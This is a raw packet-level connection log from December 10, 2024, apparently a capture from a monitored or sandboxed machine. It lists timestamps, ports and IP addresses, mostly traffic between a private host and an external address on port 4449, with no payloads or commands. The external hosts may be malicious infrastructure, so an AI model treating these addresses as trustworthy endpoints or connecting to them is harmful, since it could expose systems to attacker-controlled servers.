Dec 10, 2024 11:11:24.453680992 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.453739882 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.456459045 CET	80	49868	185.215.113.43	192.168.2.5
Dec 10, 2024 11:11:24.456515074 CET	49868	80	192.168.2.5	185.215.113.43
Dec 10, 2024 11:11:24.458327055 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.458440065 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.458504915 CET	4449	49869	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.458803892 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.462378979 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.462532997 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.462593079 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.464946032 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.465122938 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.465197086 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.468837023 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.468974113 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.469085932 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.473026991 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.473133087 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.473184109 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.479701042 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.483740091 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.483763933 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.483818054 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.483855009 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.492940903 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.493065119 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.493132114 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.502872944 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.502983093 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.503032923 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.503788948 CET	4449	49878	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.505312920 CET	4449	49869	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.505369902 CET	49869	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.515371084 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.515475988 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.515527010 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.519824982 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.519959927 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.520008087 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.525166035 CET	4449	49879	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.527049065 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.527143955 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.527735949 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.531434059 CET	4449	49870	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.534959078 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.535089016 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.535136938 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.537986040 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.538077116 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.538124084 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.540119886 CET	4449	49871	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.541989088 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.542114019 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.543734074 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.546739101 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.546829939 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.547739983 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.550848961 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.550976992 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.551736116 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.553432941 CET	4449	49872	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.555264950 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.555372953 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.555413961 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.559561968 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.561841965 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.561913013 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.561969042 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.569883108 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.569989920 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.570041895 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.575212002 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.575329065 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.575380087 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.579114914 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.579216003 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.579267979 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.581949949 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.582129002 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.582175016 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.586189032 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.586262941 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.586312056 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.590892076 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.590974092 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.591023922 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.595217943 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.595304966 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.595350981 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.603138924 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.603234053 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.603287935 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.605161905 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.605261087 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.605303049 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.612409115 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.622786045 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.622953892 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.623011112 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.635335922 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.635438919 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.635487080 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.639815092 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.639902115 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.639967918 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.647186041 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.647380114 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.647425890 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.654476881 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.654571056 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.654613018 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.657363892 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.657394886 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.657466888 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.663073063 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.663173914 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.663213968 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.667013884 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.667148113 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.667190075 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.670984030 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.671135902 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.671183109 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.674860954 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.675030947 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.675093889 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.681277037 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.681376934 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.681431055 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.689486980 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.689641953 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.689693928 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.694744110 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.694915056 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.694964886 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.698709011 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.698829889 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.698888063 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.701519966 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.701756954 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.701803923 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.705997944 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.706130981 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.706177950 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.710480928 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.710624933 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.710676908 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.715200901 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.715301991 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.715354919 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.723503113 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.723617077 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.723649979 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.725801945 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.725893021 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.725936890 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.743706942 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.743840933 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.747761011 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.754842997 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.754983902 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.755075932 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.759334087 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.759412050 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.759473085 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.766793013 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.767018080 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.767072916 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.774007082 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.774118900 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.774179935 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.776658058 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.776762009 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.776833057 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.782493114 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.782672882 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.782738924 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.786613941 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.786739111 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.786791086 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.790579081 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.790662050 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.790721893 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.794485092 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.794601917 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.794655085 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.800710917 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.800821066 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.800885916 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.809575081 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.809705973 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.809781075 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.814382076 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:24.814496040 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.814577103 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.814619064 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.815068960 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:24.818280935 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.818408012 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.818487883 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.821213007 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.821324110 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.821727037 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.825716972 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.825829983 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.825890064 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.830471992 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.830686092 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.830729008 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.835530996 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.835678101 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.835732937 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.843014002 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.843125105 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.843178988 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.845263958 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.845364094 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.845552921 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.867167950 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.867283106 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.874401093 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.874509096 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.874742031 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.874756098 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.878859043 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.878978968 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.879437923 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.886446953 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.886545897 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.887530088 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.893423080 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.893635035 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.895020008 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.896104097 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.896209955 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.902014971 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.902136087 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.905595064 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.906117916 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.906194925 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.906893969 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.910028934 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.910142899 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.910269976 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.913983107 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.914124966 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.915328979 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.920270920 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.920371056 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.921372890 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.929116011 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.929234982 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.929383039 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.933350086 CET	49870	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.933973074 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.934079885 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.934215069 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:24.934385061 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:24.935466051 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:24.935483932 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.935535908 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:24.935839891 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:24.937742949 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.937885046 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.937938929 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.941005945 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.941107988 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.941299915 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.945197105 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.945342064 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.945476055 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.949985981 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.950099945 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.951834917 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.955024958 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.955130100 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.955482960 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.962483883 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.962582111 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.962634087 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.964833975 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.964998960 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.965725899 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.987780094 CET	443	49867	104.21.32.1	192.168.2.5
Dec 10, 2024 11:11:24.987879992 CET	443	49867	104.21.32.1	192.168.2.5
Dec 10, 2024 11:11:24.987955093 CET	49867	443	192.168.2.5	104.21.32.1
Dec 10, 2024 11:11:24.989203930 CET	49867	443	192.168.2.5	104.21.32.1
Dec 10, 2024 11:11:24.989224911 CET	443	49867	104.21.32.1	192.168.2.5
Dec 10, 2024 11:11:24.989243031 CET	49867	443	192.168.2.5	104.21.32.1
Dec 10, 2024 11:11:24.989248991 CET	443	49867	104.21.32.1	192.168.2.5
Dec 10, 2024 11:11:24.994081020 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.994208097 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.994756937 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:24.996375084 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.996481895 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:24.997823954 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.000837088 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.001022100 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.002047062 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.006839037 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.006925106 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.007153988 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.014359951 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.014489889 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.015250921 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.018924952 CET	49871	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.025022984 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.025098085 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.025352955 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.027367115 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.027472973 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.027527094 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.031663895 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.031795979 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.031925917 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.036192894 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.036293983 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.036339045 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.040657043 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.040813923 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.040865898 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.045190096 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.045286894 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.045381069 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.049655914 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.049760103 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.049834013 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.052922010 CET	4449	49870	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.053632021 CET	49870	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.054866076 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.054992914 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.055124044 CET	80	49880	185.215.113.16	192.168.2.5
